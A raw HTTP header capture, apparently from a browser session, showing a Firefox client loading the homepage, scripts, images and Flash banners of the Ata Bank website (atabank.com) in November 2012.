GET / HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Date: Wed, 07 Nov 2012 21:48:23 GMT Server: Apache X-Powered-By: PHP/4.4.9 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1; path=/ Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked
GET /js/jquery.min.js HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: application/javascript Date: Wed, 07 Nov 2012 21:48:24 GMT Server: Apache Last-Modified: Wed, 07 Nov 2012 19:04:32 GMT Etag: "2580390-1829c-4cdec638683ba" Accept-Ranges: bytes Content-Length: 98972 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive
GET /img/bg.png HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/png Date: Wed, 07 Nov 2012 21:48:24 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:09 GMT Etag: "25802e6-3c1-4ccb6c183da81" Accept-Ranges: bytes Content-Length: 961 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive
GET /img/folder_1_text_az.png HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/png Date: Wed, 07 Nov 2012 21:48:24 GMT Server: Apache Last-Modified: Thu, 01 Nov 2012 17:17:39 GMT Etag: "25802f5-c74-4cd723237b9e0" Accept-Ranges: bytes Content-Length: 3188 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive
GET /img/folder_2_text_az.png HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/png Date: Wed, 07 Nov 2012 21:48:24 GMT Server: Apache Last-Modified: Thu, 01 Nov 2012 17:19:45 GMT Etag: "25802f7-6f3-4cd7239b9de5f" Accept-Ranges: bytes Content-Length: 1779 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive
GET /img/folder_3_text_az.png HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/png Date: Wed, 07 Nov 2012 21:48:24 GMT Server: Apache Last-Modified: Thu, 01 Nov 2012 17:18:45 GMT Etag: "25802f9-752-4cd723624aabc" Accept-Ranges: bytes Content-Length: 1874 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive
GET /img/logo.png HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/png Date: Wed, 07 Nov 2012 21:48:24 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:20 GMT Etag: "2580310-837-4ccb6c22f4806" Accept-Ranges: bytes Content-Length: 2103 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive
GET /img/top_bg.jpg HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/jpeg Date: Wed, 07 Nov 2012 21:48:24 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:50 GMT Etag: "2580373-3565-4ccb6c3f0e038" Accept-Ranges: bytes Content-Length: 13669 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive
GET /js/jquery.easing.1.3.js HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: application/javascript Date: Wed, 07 Nov 2012 21:48:24 GMT Server: Apache Last-Modified: Wed, 07 Nov 2012 19:04:26 GMT Etag: "2580389-2b3d-4cdec632e771e" Accept-Ranges: bytes Content-Length: 11069 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive
GET /img/pix.gif HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/gif Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:36 GMT Etag: "2580348-31-4ccb6c31ee267" Accept-Ranges: bytes Content-Length: 49 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive
GET /js/jquery.ennui.contentslider.js HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: application/javascript Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Wed, 07 Nov 2012 19:04:28 GMT Etag: "258038f-3032-4cdec634c4f7b" Accept-Ranges: bytes Content-Length: 12338 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive
GET /_files/356/temir.swf HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: application/x-shockwave-flash Date: Wed, 07 Nov 2012 21:48:24 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:48:47 GMT Etag: "264110b-799b-4ccb6e0670df0" Accept-Ranges: bytes Content-Length: 31131 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive
GET /img/icon_136.gif HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/gif Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:19 GMT Etag: "258030c-284-4ccb6c21fa3a1" Accept-Ranges: bytes Content-Length: 644 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive
GET /img/icon_sitemap.gif HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/gif Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:20 GMT Etag: "258030e-17b-4ccb6c2272dbd" Accept-Ranges: bytes Content-Length: 379 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive
GET /_files/357/nagd.swf HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: application/x-shockwave-flash Date: Wed, 07 Nov 2012 21:48:24 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:48:51 GMT Etag: "2641111-9ade-4ccb6e0987371" Accept-Ranges: bytes Content-Length: 39646 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive
GET /_files/355/avto.swf HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: application/x-shockwave-flash Date: Wed, 07 Nov 2012 21:48:24 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:48:42 GMT Etag: "26410ff-c75f-4ccb6e01c02fe" Accept-Ranges: bytes Content-Length: 51039 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive
GET /img/test_bg.png___ HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 404 Not Found Content-Type: text/html; charset=iso-8859-1 Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Content-Length: 400 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive
GET /img/block_i_l1.gif HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/gif Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:11 GMT Etag: "25802ed-238-4ccb6c19fef41" Accept-Ranges: bytes Content-Length: 568 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive
GET /img/block_i_l2.gif HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/gif Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:11 GMT Etag: "25802ef-24a-4ccb6c1a39977" Accept-Ranges: bytes Content-Length: 586 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive
GET /img/block_header_0.png HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/png Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:10 GMT Etag: "25802e9-26b-4ccb6c190c4ec" Accept-Ranges: bytes Content-Length: 619 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive
GET /img/folder_bg_0.png HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/css/style.css Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/png Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:13 GMT Etag: "25802fb-3745-4ccb6c1c0dcef" Accept-Ranges: bytes Content-Length: 14149 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive
GET /img/block_header.png HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/css/style.css Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/png Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:10 GMT Etag: "25802e8-229-4ccb6c18d0b13" Accept-Ranges: bytes Content-Length: 553 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive
GET /img/block_i_1.gif HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/gif Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:10 GMT Etag: "25802ea-210-4ccb6c1949556" Accept-Ranges: bytes Content-Length: 528 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive
GET /img/block_i_2.gif HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/gif Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:10 GMT Etag: "25802eb-230-4ccb6c1981f6b" Accept-Ranges: bytes Content-Length: 560 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive
GET /img/block_i_3.gif HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/gif Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:11 GMT Etag: "25802ec-1eb-4ccb6c19c2fc6" Accept-Ranges: bytes Content-Length: 491 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive
GET /img/block_bg.png HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/css/style.css Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/png Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:09 GMT Etag: "25802e7-958-4ccb6c1882065" Accept-Ranges: bytes Content-Length: 2392 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive
GET /img/icon_lang.gif HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/css/style.css Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/gif Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:20 GMT Etag: "258030d-164-4ccb6c22353f7" Accept-Ranges: bytes Content-Length: 356 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive
GET /img/online_1.gif HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/gif Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:30 GMT Etag: "2580330-f0-4ccb6c2c00157" Accept-Ranges: bytes Content-Length: 240 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive
GET /img/online_2.gif HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/gif Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:30 GMT Etag: "2580332-ef-4ccb6c2c37119" Accept-Ranges: bytes Content-Length: 239 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive
GET /img/online_5.gif HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/gif Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:31 GMT Etag: "2580338-10b-4ccb6c2cfe535" Accept-Ranges: bytes Content-Length: 267 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive
GET /img/online_3.gif HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/gif Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:30 GMT Etag: "2580334-153-4ccb6c2c73517" Accept-Ranges: bytes Content-Length: 339 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive
GET /img/online_6.gif HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/gif Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:31 GMT Etag: "2580339-15c-4ccb6c2d2b3f5" Accept-Ranges: bytes Content-Length: 348 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive
GET /img/online_4.gif HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/gif Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:31 GMT Etag: "2580335-18c-4ccb6c2cb35fe" Accept-Ranges: bytes Content-Length: 396 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive
GET /img/online_7.gif HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/gif Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:31 GMT Etag: "258033a-111-4ccb6c2d6bab9" Accept-Ranges: bytes Content-Length: 273 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive
GET /img/s0.png HTTP/1.1 Host: www.atabank.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://www.atabank.com/ Cookie: PHPSESSID=10255ed31e8cdc917eb902dcf823a0f1	HTTP/1.1 200 OK Content-Type: image/png Date: Wed, 07 Nov 2012 21:48:25 GMT Server: Apache Last-Modified: Tue, 23 Oct 2012 09:40:39 GMT Etag: "2580357-647-4ccb6c3496e8f" Accept-Ranges: bytes Content-Length: 1607 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive
